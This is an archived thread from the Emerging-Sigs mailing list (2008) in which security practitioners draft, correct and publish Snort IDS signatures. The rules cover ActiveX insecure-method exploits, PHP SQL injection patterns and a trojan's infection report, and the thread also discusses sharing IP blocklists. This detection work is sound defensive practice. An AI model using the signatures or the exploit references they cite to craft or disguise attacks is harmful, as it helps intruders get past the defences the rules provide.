From pepperjack at afferentsecurity.com Wed Oct 1 08:24:42 2008 From: pepperjack at afferentsecurity.com (Jack Pepper) Date: Wed, 01 Oct 2008 07:24:42 -0500 Subject: [Emerging-Sigs] defect on rule 2008609 Message-ID: <20081001072442.1nu0c6v0004cs0gk@mail.afferentsecurity.com> url reference should not have http:// in the rule text: alert udp $EXTERNAL_NET any -> $HOME_NET 5060 (msg:"ET SCAN Sivus VOIP Vulnerability Scanner SIP Scan"; content:"SIVuS_VoIP_Scanner Hi Matt, Please find 5 New Signatures below: 1. Autodesk Design Review DWF Viewer ActiveX Control SaveAs Insecure Method. alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Autodesk Design Review DWF Viewer ActiveX Control SaveAs Insecure Method"; flow:to_client,established; content:"CLSID"; nocase; content:"A662DA7E-CCB7-4743-B71A-D817F6D575DF"; distance:0; nocase; content:"SaveAS"; nocase; classtype:web-application-attack; reference:url,retrogod.altervista.org/9sg_autodesk_revit_arch_2009_exploit.html; reference:url,secunia.com/Advisories/31989/; sid:8409; rev:1;) 2. GdPicture Pro ActiveX control SaveAsPDF Insecure Method. alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"GdPicture Pro ActiveX control SaveAsPDF Insecure Method"; flow:to_client,established; content:"CLSID"; nocase; content:"E8512363-3581-42EF-A43D-990E7935C8BE"; distance:0; nocase; content:"SaveAsPDF"; nocase; classtype:web-application-attack; reference:url,secunia.com/Advisories/31966/; reference:url,milw0rm.com/exploits/6638; sid:8410; rev:1;) 3. PHP-lance 'catid' sql injection. alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP PHP-Lance show.php catid SQL Injection"; flow:established,to_server; content:"GET"; uricontent:"/show.php?catid="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack;reference:url,secunia.com/Advisories/32027/; reference:url,www.milw0rm.com/exploits/6605; sid:8406; rev:1;) 4. Real Estate Manager realestate-index.php 'cat_id' sql injection. alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Real Estate Manager realestate-index.php cat_id SQL Injection"; flow:established,to_server; content:"GET"; uricontent:"realestate-index.php?"; nocase; uricontent:"&cat_id="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,secunia.com/Advisories/32049/; reference:url,www.milw0rm.com/exploits/6599; sid:8407; rev:1;) 5. Pilot Online Training Solutions news_read.php 'id' sql injection. alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Pilot Online Training Solution news_read.php id SQL Injection"; flow:established,to_server; content:"GET"; uricontent:"/news_read.php?id="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack;reference:url,secunia.com/Advisories/31969/; reference:url,www.milw0rm.com/exploits/6613; sid:8408; rev:1;) Looking forward for your comments if any... Thanks & Regards, StillSecure -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081001/c4996826/attachment-0001.html From mstone at mathom.us Wed Oct 1 11:56:16 2008 From: mstone at mathom.us (Michael Stone) Date: Wed, 01 Oct 2008 11:56:16 -0400 Subject: [Emerging-Sigs] TroDjan 2.0 rules In-Reply-To: <48DBB7EC.5020403@jonkmans.com> References: <54125DA6FB3A3249B874A94D39E9E6D9038EE8EA@BENDER.centenarycollege.edu> <48DAF6F3.6090404@jonkmans.com> <54125DA6FB3A3249B874A94D39E9E6D9038EEA4D@BENDER.centenarycollege.edu> <48DBB7EC.5020403@jonkmans.com> Message-ID: <20081001155613.GC6860@mathom.us> On Thu, Sep 25, 2008 at 12:10:20PM -0400, Matt Jonkman wrote: >That initial port 1800 connection has the string: > >"Windows NT 5.1 (Build 2600: Service Pack 3)" > >Which I think we can assume that'll always start with Windows, and >always be under say 60 bytes. That should make the first rule more >reliable. So I'll post this: > >alert tcp $HOME_NET any -> $EXTERNAL_NET 1800 (msg:"ET TROJAN TroDjan >2.0 Infection Report"; flow:established,to_server; dsize:<60; >classtype:trojan-activity; sid:xx; rev:1;) > >That look good to everyone? Well, in the analysis you talke about "start with windows", but the sig only looks at traffic to port 1800 with a size under 60--it's fp'ing like crazy here. (Pretty much all signatures along the lines of "look for a little packet to a particular port" are useless on any kind of busy network, especially if FTP or P2P are present.) Mike Stone From jonkman at jonkmans.com Wed Oct 1 12:23:29 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Wed, 01 Oct 2008 12:23:29 -0400 Subject: [Emerging-Sigs] TroDjan 2.0 rules In-Reply-To: <20081001155613.GC6860@mathom.us> References: <54125DA6FB3A3249B874A94D39E9E6D9038EE8EA@BENDER.centenarycollege.edu> <48DAF6F3.6090404@jonkmans.com> <54125DA6FB3A3249B874A94D39E9E6D9038EEA4D@BENDER.centenarycollege.edu> <48DBB7EC.5020403@jonkmans.com> <20081001155613.GC6860@mathom.us> Message-ID: <48E3A401.5050906@jonkmans.com> You're right! I brainfarted the first sig. I meant to put in the windows string but didn't actually do it. Fixing that now! Matt Michael Stone wrote: > On Thu, Sep 25, 2008 at 12:10:20PM -0400, Matt Jonkman wrote: >> That initial port 1800 connection has the string: >> >> "Windows NT 5.1 (Build 2600: Service Pack 3)" >> >> Which I think we can assume that'll always start with Windows, and >> always be under say 60 bytes. That should make the first rule more >> reliable. So I'll post this: >> >> alert tcp $HOME_NET any -> $EXTERNAL_NET 1800 (msg:"ET TROJAN TroDjan >> 2.0 Infection Report"; flow:established,to_server; dsize:<60; >> classtype:trojan-activity; sid:xx; rev:1;) >> >> That look good to everyone? > > Well, in the analysis you talke about "start with windows", but the sig > only looks at traffic to port 1800 with a size under 60--it's fp'ing > like crazy here. (Pretty much all signatures along the lines of "look > for a little packet to a particular port" are useless on any kind of > busy network, especially if FTP or P2P are present.) > > Mike Stone > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Wed Oct 1 12:27:12 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Wed, 01 Oct 2008 12:27:12 -0400 Subject: [Emerging-Sigs] defect on rule 2008609 In-Reply-To: <20081001072442.1nu0c6v0004cs0gk@mail.afferentsecurity.com> References: <20081001072442.1nu0c6v0004cs0gk@mail.afferentsecurity.com> Message-ID: <48E3A4E0.2020801@jonkmans.com> Thanks Jack, got this fixed as well! Matt Jack Pepper wrote: > url reference should not have http:// in the rule text: > > > alert udp $EXTERNAL_NET any -> $HOME_NET 5060 (msg:"ET SCAN Sivus VOIP > Vulnerability Scanner SIP Scan"; content:"SIVuS_VoIP_Scanner > count 3, seconds 10; classtype:attempted-recon; > reference:url,www.security-database.com/toolswatch/SiVus-VoIP-Security-Scanner-1-09.html; reference:url,http://www.vopsecurity.org/; sid:2008609; > rev:1;) > > > jp > > -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From emerging at emergingthreats.net Wed Oct 1 16:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Wed, 1 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081001200008.D8B8045026@goliath.jonkmans.com> [***] Results from Oinkmaster started Wed Oct 1 16:00:08 2008 [***] [+++] Added rules: [+++] 2008611 - ET P2P SoulSeek P2P Login Response (emerging-p2p.rules) [///] Modified active rules: [///] 2008587 - ET TROJAN TroDjan 2.0 Infection Report (emerging-virus.rules) 2008595 - ET P2P SoulSeek P2P Server Connection (emerging-p2p.rules) 2008607 - ET EXPLOIT Chilkat IMAP ActiveX File Execution and IE DoS (emerging-exploit.rules) 2008609 - ET SCAN Sivus VOIP Vulnerability Scanner SIP Scan (emerging-scan.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (5): 2008607 || ET EXPLOIT Chilkat IMAP ActiveX File Execution and IE DoS || url,www.milw0rm.com/exploits/6600 2008609 || ET SCAN Sivus VOIP Vulnerability Scanner SIP Scan || url,www.vopsecurity.org/ || url,www.security-database.com/toolswatch/SiVus-VoIP-Security-Scanner-1-09.html 2008611 || ET P2P SoulSeek P2P Login Response || url,www.slsknet.org 2500081 || ET COMPROMISED Known Compromised or Hostile Host Traffic (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510081 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Added to emerging-sid-msg.map.txt (5): 2008607 || ET EXPLOIT Chilkat IMAP ActiveX File Execution and IE DoS || url,www.milw0rm.com/exploits/6600 2008609 || ET SCAN Sivus VOIP Vulnerability Scanner SIP Scan || url,www.vopsecurity.org/ || url,www.security-database.com/toolswatch/SiVus-VoIP-Security-Scanner-1-09.html 2008611 || ET P2P SoulSeek P2P Login Response || url,www.slsknet.org 2500081 || ET COMPROMISED Known Compromised or Hostile Host Traffic (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510081 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (2): 2008607 || Chilkat IMAP ActiveX File Execution and IE DoS || url,www.milw0rm.com/exploits/6600 2008609 || ET SCAN Sivus VOIP Vulnerability Scanner SIP Scan || url,http://www.vopsecurity.org/ || url,www.security-database.com/toolswatch/SiVus-VoIP-Security-Scanner-1-09.html -> Removed from emerging-sid-msg.map.txt (2): 2008607 || Chilkat IMAP ActiveX File Execution and IE DoS || url,www.milw0rm.com/exploits/6600 2008609 || ET SCAN Sivus VOIP Vulnerability Scanner SIP Scan || url,http://www.vopsecurity.org/ || url,www.security-database.com/toolswatch/SiVus-VoIP-Security-Scanner-1-09.html From diomar at rmws.net Wed Oct 1 16:24:19 2008 From: diomar at rmws.net (Joe Carvalho) Date: Wed, 01 Oct 2008 16:24:19 -0400 Subject: [Emerging-Sigs] New attacks reveal fundamental problems with TCP In-Reply-To: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2904@webmail.latis.com> References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2904@webmail.latis.com> Message-ID: <0006EEE2-C279-4D60-B67C-26A54225270D@rmws.net> any thoughts on alerting/mitigating for this behavior? http://searchsecurity.techtarget.com/news/article/ 0,289142,sid14_gci1332898,00.html tnx --joe From jonkman at jonkmans.com Wed Oct 1 17:24:40 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Wed, 01 Oct 2008 17:24:40 -0400 Subject: [Emerging-Sigs] New attacks reveal fundamental problems with TCP In-Reply-To: <0006EEE2-C279-4D60-B67C-26A54225270D@rmws.net> References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2904@webmail.latis.com> <0006EEE2-C279-4D60-B67C-26A54225270D@rmws.net> Message-ID: <48E3EA98.7080108@jonkmans.com> I haven't seen any real detail yet. Anyone listen to the presentation yet? Is there detail in there? Matt Joe Carvalho wrote: > any thoughts on alerting/mitigating for this behavior? > > http://searchsecurity.techtarget.com/news/article/ > 0,289142,sid14_gci1332898,00.html > > tnx > --joe > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Wed Oct 1 18:13:03 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Wed, 01 Oct 2008 18:13:03 -0400 Subject: [Emerging-Sigs] StillSecure: Signatures - 1st Oct-08 In-Reply-To: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2904@webmail.latis.com> References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2904@webmail.latis.com> Message-ID: <48E3F5EF.3060904@jonkmans.com> Will get these posted now. The sql injection sigs I'll probably put into web_specific, since the general sql injection sigs will catch those, but it is good to have the more specific sig for shops that need it. Thanks guys!! Matt signatures wrote: > Hi Matt, > > Please find 5 New Signatures below: > > > > *1. **Autodesk Design Review DWF Viewer ActiveX Control SaveAs > Insecure Method.*** > > alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Autodesk Design > Review DWF Viewer ActiveX Control SaveAs Insecure Method"; > flow:to_client,established; content:"CLSID"; nocase; > content:"A662DA7E-CCB7-4743-B71A-D817F6D575DF"; distance:0; nocase; > content:"SaveAS"; nocase; classtype:web-application-attack; > reference:url,retrogod.altervista.org/9sg_autodesk_revit_arch_2009_exploit.html; > reference:url,secunia.com/Advisories/31989/; sid:8409; rev:1;) > > > > *2. **GdPicture Pro ActiveX control SaveAsPDF Insecure Method*. > > alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"GdPicture Pro ActiveX > control SaveAsPDF Insecure Method"; flow:to_client,established; > content:"CLSID"; nocase; content:"E8512363-3581-42EF-A43D-990E7935C8BE"; > distance:0; nocase; content:"SaveAsPDF"; nocase; > classtype:web-application-attack; > reference:url,secunia.com/Advisories/31966/; > reference:url,milw0rm.com/exploits/6638; sid:8410; rev:1;) > > > > *3. **PHP-lance 'catid' sql injection.*** > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > PHP-Lance show.php catid SQL Injection"; flow:established,to_server; > content:"GET"; uricontent:"/show.php?catid="; nocase; > pcre:"/UNION.+SELECT/Ui"; > classtype:web-application-attack;reference:url,secunia.com/Advisories/32027/; > reference:url,www.milw0rm.com/exploits/6605; sid:8406; rev:1;) > > > > *4. **Real Estate Manager realestate-index.php 'cat_id' sql injection.* > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > Real Estate Manager realestate-index.php cat_id SQL Injection"; > flow:established,to_server; content:"GET"; > uricontent:"realestate-index.php?"; nocase; uricontent:"&cat_id="; > nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:url,secunia.com/Advisories/32049/; > reference:url,www.milw0rm.com/exploits/6599; sid:8407; rev:1;) > > > > *5. **Pilot Online Training Solutions news_read.php 'id' sql > injection.*** > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > Pilot Online Training Solution news_read.php id SQL Injection"; > flow:established,to_server; content:"GET"; > uricontent:"/news_read.php?id="; nocase; pcre:"/UNION.+SELECT/Ui"; > classtype:web-application-attack;reference:url,secunia.com/Advisories/31969/; > reference:url,www.milw0rm.com/exploits/6613; sid:8408; rev:1;) > > > > Looking forward for your comments if any... > > Thanks & Regards, > StillSecure > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From spooker at gmail.com Wed Oct 1 18:16:29 2008 From: spooker at gmail.com (Rodrigo Montoro(Sp0oKeR)) Date: Wed, 1 Oct 2008 20:16:29 -0200 Subject: [Emerging-Sigs] New attacks reveal fundamental problems with TCP In-Reply-To: <48E3EA98.7080108@jonkmans.com> References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2904@webmail.latis.com> <0006EEE2-C279-4D60-B67C-26A54225270D@rmws.net> <48E3EA98.7080108@jonkmans.com> Message-ID: <9255886c0810011516q231f6a17taa6bb662c2d9d596@mail.gmail.com> Nothing really new yet but some points http://asert.arbornetworks.com/2008/10/thoughts-on-the-tcpip-stack-dos/ Regards, On Wed, Oct 1, 2008 at 7:24 PM, Matt Jonkman wrote: > I haven't seen any real detail yet. Anyone listen to the presentation > yet? Is there detail in there? > > Matt > > Joe Carvalho wrote: > > any thoughts on alerting/mitigating for this behavior? > > > > http://searchsecurity.techtarget.com/news/article/ > > 0,289142,sid14_gci1332898,00.html > > > > tnx > > --joe > > > > _______________________________________________ > > Emerging-sigs mailing list > > Emerging-sigs at emergingthreats.net > > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > > -- > -------------------------------------------- > Matthew Jonkman > Emerging Threats > Phone 765-429-0398 > Fax 312-264-0205 > http://www.emergingthreats.net > -------------------------------------------- > > PGP: http://www.jonkmans.com/mattjonkman.asc > > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > -- =========================== Rodrigo Montoro (Sp0oKeR) Security Analyst SnortCP / RHCE / LPIC-I / MCSO http://www.spooker.com.br http://www.snort.org.br http://www.linkedin.com/in/spooker =========================== -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081001/35ee0bd9/attachment-0001.html From frank at knobbe.us Wed Oct 1 22:23:05 2008 From: frank at knobbe.us (Frank Knobbe) Date: Wed, 01 Oct 2008 21:23:05 -0500 Subject: [Emerging-Sigs] Rule source question In-Reply-To: <48D90B77.8090607@packetnexus.com> References: <48D8F653.6040000@packetnexus.com> <48D90723.5040803@jonkmans.com> <48D90B77.8090607@packetnexus.com> Message-ID: <1222914185.36986.112.camel@localhost> On Tue, 2008-09-23 at 11:29 -0400, Jason Lewis wrote: > Applications that block hosts on your network and let you share the data > are interesting to me. There is a trust issue and a possible attack > vector, but it's interesting data. Hi Jason, there is also a usability aspect to consider. Several years back we peered live Snortsam block feeds amongst a group of 4-5, each managing/monitoring larger networks. I did a bit of research during this time, and came to realize that hostile IP's divide into two categories, those that are likely to hit you and those that are not. For example, known botnet controllers, phishing and malware sites (even though numerous) are very useful to share since they do affect us all. However, the other group, comprising port scanners, brute-force IP's, and at one time, a live-feed of joining botnet zombies/drones, has a lower chance of affecting your network. There are IP's which scans can and do affect a larger population. But a large percentage appeared to just have a local impact, mostly due to the way the scanning engines are implemented and/or targeted. I'm currently massaging an IP address intelligence database I accumulated over time, and see some surprising results and a clear split of the affect-all-evil-IPs and the localized-evil-IPs. Sharing of block data is all well intended, but I don't think we should just share them all without qualification. Take DShield for example. The block list they offer is compromise of the IP's that most of us have encountered. Sharing a DenyHosts list of a single entity (or a combines list of several entities) will inflate your pool of hostile IP's with a large amount of IP's that will likely never hit you. Instead of just sharing lists of blocked IP's, which would inevitably result in a large number of IP's, I think we should start a project, similar to DShield (but not exactly the same -- we certainly don't need to reinvent the wheel), that takes all the IP address information from various sources and qualifies them by how many reports by how many individuals and lists they have been reported on. That will result in a smaller list of IP addresses that have a higher chance of affecting someone. If you want an unqualified list of IP's, I can throw millions of IP's I logged at you. Of course your firewall is gonna cease up with such a huge block list :) I think qualifying reported IP's and condensing a high-risk, high-value, smaller list will be much more usable. Matt, if you like to collaborate on a project like that, please let me know. (or maybe you have such a thing and I just haven't seen it yet ;) Cheers, Frank -- It is said that the Internet is a public utility. As such, it is best compared to a sewer. A big, fat pipe with a bunch of crap sloshing against your ports. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 187 bytes Desc: This is a digitally signed message part Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081001/01b88c76/attachment.bin From jonkman at jonkmans.com Thu Oct 2 10:50:21 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 02 Oct 2008 10:50:21 -0400 Subject: [Emerging-Sigs] Rule source question In-Reply-To: <1222914185.36986.112.camel@localhost> References: <48D8F653.6040000@packetnexus.com> <48D90723.5040803@jonkmans.com> <48D90B77.8090607@packetnexus.com> <1222914185.36986.112.camel@localhost> Message-ID: <48E4DFAD.5060901@jonkmans.com> Frank Knobbe wrote: > Instead of just sharing lists of blocked IP's, which would inevitably > result in a large number of IP's, I think we should start a project, > similar to DShield (but not exactly the same -- we certainly don't need > to reinvent the wheel), that takes all the IP address information from > various sources and qualifies them by how many reports by how many > individuals and lists they have been reported on. That will result in a > smaller list of IP addresses that have a higher chance of affecting > someone. > > If you want an unqualified list of IP's, I can throw millions of IP's I > logged at you. Of course your firewall is gonna cease up with such a > huge block list :) I think qualifying reported IP's and condensing a > high-risk, high-value, smaller list will be much more usable. > > > Matt, if you like to collaborate on a project like that, please let me > know. (or maybe you have such a thing and I just haven't seen it yet ;) Funny you should mention that. This is exactly what SIDReporter intends to be. By using attackers linked tot he signature they tripped and then correlating that amongst many sites for reliability, I believe we can make a VERY good list of things to block and feed that abck to our users. We can even filter those lists by service. Say a site is only a webfarm with no ssh exposed. They could choose to not get IPs that were only listed for ssh brute forcing, or only for netbios attacks, etc. The data is starting to flow with SIDReporter, thanks to the folks using it so far. We're learning how to manipulate this data and will be feeding abck some trends and top attackers very soon. More input is required though, so please consider setting up and feeding back, it's all anonymous!! http://doc.emergingthreats.net/bin/view/Main/SidReporter Matt > > Cheers, > Frank > > > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jlewis at packetnexus.com Thu Oct 2 11:04:22 2008 From: jlewis at packetnexus.com (Jason Lewis) Date: Thu, 02 Oct 2008 11:04:22 -0400 Subject: [Emerging-Sigs] Rule source question In-Reply-To: <1222914185.36986.112.camel@localhost> References: <48D8F653.6040000@packetnexus.com> <48D90723.5040803@jonkmans.com> <48D90B77.8090607@packetnexus.com> <1222914185.36986.112.camel@localhost> Message-ID: <48E4E2F6.9020005@packetnexus.com> Frank this sounds to me like an IP reputation system. I've given some thought to a system that tracked IP reputation, which would in turn lead to a CIDR reputation list as well as Autonomous System rep list. The idea is that a CIDR with lots of bad IPs would also bad by association. It seems that a few spam blacklists work in a similar way. The idea of data merging isn't new and that sounds like what you're proposing. If an IP is on a botnet list and a spam list and a IDS alert list, etc... you would start to think blocking that IP is a good idea. jas Frank Knobbe wrote: > On Tue, 2008-09-23 at 11:29 -0400, Jason Lewis wrote: > >> Applications that block hosts on your network and let you share the data >> are interesting to me. There is a trust issue and a possible attack >> vector, but it's interesting data. >> > > Hi Jason, > > there is also a usability aspect to consider. Several years back we > peered live Snortsam block feeds amongst a group of 4-5, each > managing/monitoring larger networks. I did a bit of research during this > time, and came to realize that hostile IP's divide into two categories, > those that are likely to hit you and those that are not. For example, > known botnet controllers, phishing and malware sites (even though > numerous) are very useful to share since they do affect us all. However, > the other group, comprising port scanners, brute-force IP's, and at one > time, a live-feed of joining botnet zombies/drones, has a lower chance > of affecting your network. > > There are IP's which scans can and do affect a larger population. But a > large percentage appeared to just have a local impact, mostly due to the > way the scanning engines are implemented and/or targeted. > > I'm currently massaging an IP address intelligence database I > accumulated over time, and see some surprising results and a clear split > of the affect-all-evil-IPs and the localized-evil-IPs. > > Sharing of block data is all well intended, but I don't think we should > just share them all without qualification. Take DShield for example. The > block list they offer is compromise of the IP's that most of us have > encountered. Sharing a DenyHosts list of a single entity (or a combines > list of several entities) will inflate your pool of hostile IP's with a > large amount of IP's that will likely never hit you. > > Instead of just sharing lists of blocked IP's, which would inevitably > result in a large number of IP's, I think we should start a project, > similar to DShield (but not exactly the same -- we certainly don't need > to reinvent the wheel), that takes all the IP address information from > various sources and qualifies them by how many reports by how many > individuals and lists they have been reported on. That will result in a > smaller list of IP addresses that have a higher chance of affecting > someone. > > If you want an unqualified list of IP's, I can throw millions of IP's I > logged at you. Of course your firewall is gonna cease up with such a > huge block list :) I think qualifying reported IP's and condensing a > high-risk, high-value, smaller list will be much more usable. > > > Matt, if you like to collaborate on a project like that, please let me > know. (or maybe you have such a thing and I just haven't seen it yet ;) > > Cheers, > Frank > > > From jonkman at jonkmans.com Thu Oct 2 11:09:22 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 02 Oct 2008 11:09:22 -0400 Subject: [Emerging-Sigs] Rule source question In-Reply-To: <48E4E2F6.9020005@packetnexus.com> References: <48D8F653.6040000@packetnexus.com> <48D90723.5040803@jonkmans.com> <48D90B77.8090607@packetnexus.com> <1222914185.36986.112.camel@localhost> <48E4E2F6.9020005@packetnexus.com> Message-ID: <48E4E422.8080405@jonkmans.com> Thats absolutely where we're going with SIDReporter Jason. More data sources, and some intelligent correlation. But we're learning as we go. The example Frank cited where we tried a shared snortsam feed: Worked GREAT! until we got to a large number of blocks. Then we had reliability and scale issues. I hope we can solve those issues here. But we need the data! :) Matt Jason Lewis wrote: > Frank this sounds to me like an IP reputation system. I've given some > thought to a system that tracked IP reputation, which would in turn lead > to a CIDR reputation list as well as Autonomous System rep list. The > idea is that a CIDR with lots of bad IPs would also bad by association. > It seems that a few spam blacklists work in a similar way. > > The idea of data merging isn't new and that sounds like what you're > proposing. If an IP is on a botnet list and a spam list and a IDS alert > list, etc... you would start to think blocking that IP is a good idea. > > jas > > Frank Knobbe wrote: >> On Tue, 2008-09-23 at 11:29 -0400, Jason Lewis wrote: >> >>> Applications that block hosts on your network and let you share the data >>> are interesting to me. There is a trust issue and a possible attack >>> vector, but it's interesting data. >>> >> Hi Jason, >> >> there is also a usability aspect to consider. Several years back we >> peered live Snortsam block feeds amongst a group of 4-5, each >> managing/monitoring larger networks. I did a bit of research during this >> time, and came to realize that hostile IP's divide into two categories, >> those that are likely to hit you and those that are not. For example, >> known botnet controllers, phishing and malware sites (even though >> numerous) are very useful to share since they do affect us all. However, >> the other group, comprising port scanners, brute-force IP's, and at one >> time, a live-feed of joining botnet zombies/drones, has a lower chance >> of affecting your network. >> >> There are IP's which scans can and do affect a larger population. But a >> large percentage appeared to just have a local impact, mostly due to the >> way the scanning engines are implemented and/or targeted. >> >> I'm currently massaging an IP address intelligence database I >> accumulated over time, and see some surprising results and a clear split >> of the affect-all-evil-IPs and the localized-evil-IPs. >> >> Sharing of block data is all well intended, but I don't think we should >> just share them all without qualification. Take DShield for example. The >> block list they offer is compromise of the IP's that most of us have >> encountered. Sharing a DenyHosts list of a single entity (or a combines >> list of several entities) will inflate your pool of hostile IP's with a >> large amount of IP's that will likely never hit you. >> >> Instead of just sharing lists of blocked IP's, which would inevitably >> result in a large number of IP's, I think we should start a project, >> similar to DShield (but not exactly the same -- we certainly don't need >> to reinvent the wheel), that takes all the IP address information from >> various sources and qualifies them by how many reports by how many >> individuals and lists they have been reported on. That will result in a >> smaller list of IP addresses that have a higher chance of affecting >> someone. >> >> If you want an unqualified list of IP's, I can throw millions of IP's I >> logged at you. Of course your firewall is gonna cease up with such a >> huge block list :) I think qualifying reported IP's and condensing a >> high-risk, high-value, smaller list will be much more usable. >> >> >> Matt, if you like to collaborate on a project like that, please let me >> know. (or maybe you have such a thing and I just haven't seen it yet ;) >> >> Cheers, >> Frank >> >> >> > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jlewis at packetnexus.com Thu Oct 2 11:32:45 2008 From: jlewis at packetnexus.com (Jason Lewis) Date: Thu, 02 Oct 2008 11:32:45 -0400 Subject: [Emerging-Sigs] Rule source question In-Reply-To: <48E4E422.8080405@jonkmans.com> References: <48D8F653.6040000@packetnexus.com> <48D90723.5040803@jonkmans.com> <48D90B77.8090607@packetnexus.com> <1222914185.36986.112.camel@localhost> <48E4E2F6.9020005@packetnexus.com> <48E4E422.8080405@jonkmans.com> Message-ID: <48E4E99D.5010408@packetnexus.com> One of my interests in honeypots, is analysis and traceback of the IPs visiting the honeypot. I'm not so much interested in the malware as the network information collected. The correlation of honeypots with other malicious activity is something I'm actively investigating. Along those lines, does anyone have detailed nepenthes documentation about modules and configuration? White papers would also be of interest. Matt Jonkman wrote: > Thats absolutely where we're going with SIDReporter Jason. More data > sources, and some intelligent correlation. But we're learning as we go. > > The example Frank cited where we tried a shared snortsam feed: Worked > GREAT! until we got to a large number of blocks. Then we had reliability > and scale issues. I hope we can solve those issues here. > > But we need the data! :) > > Matt > From jonkman at jonkmans.com Thu Oct 2 11:46:00 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 02 Oct 2008 11:46:00 -0400 Subject: [Emerging-Sigs] Rule source question In-Reply-To: <48E4E99D.5010408@packetnexus.com> References: <48D8F653.6040000@packetnexus.com> <48D90723.5040803@jonkmans.com> <48D90B77.8090607@packetnexus.com> <1222914185.36986.112.camel@localhost> <48E4E2F6.9020005@packetnexus.com> <48E4E422.8080405@jonkmans.com> <48E4E99D.5010408@packetnexus.com> Message-ID: <48E4ECB8.9040501@jonkmans.com> Jason Lewis wrote: > One of my interests in honeypots, is analysis and traceback of the IPs > visiting the honeypot. I'm not so much interested in the malware as the > network information collected. The correlation of honeypots with other > malicious activity is something I'm actively investigating. Agreed, I run a number of nepenthes boxes and snort in front of them with a relevant ruleset. Feeds us great data about infected nodes out there in to sidreprter! > > Along those lines, does anyone have detailed nepenthes documentation > about modules and configuration? White papers would also be of interest. > For the most part it's pretty 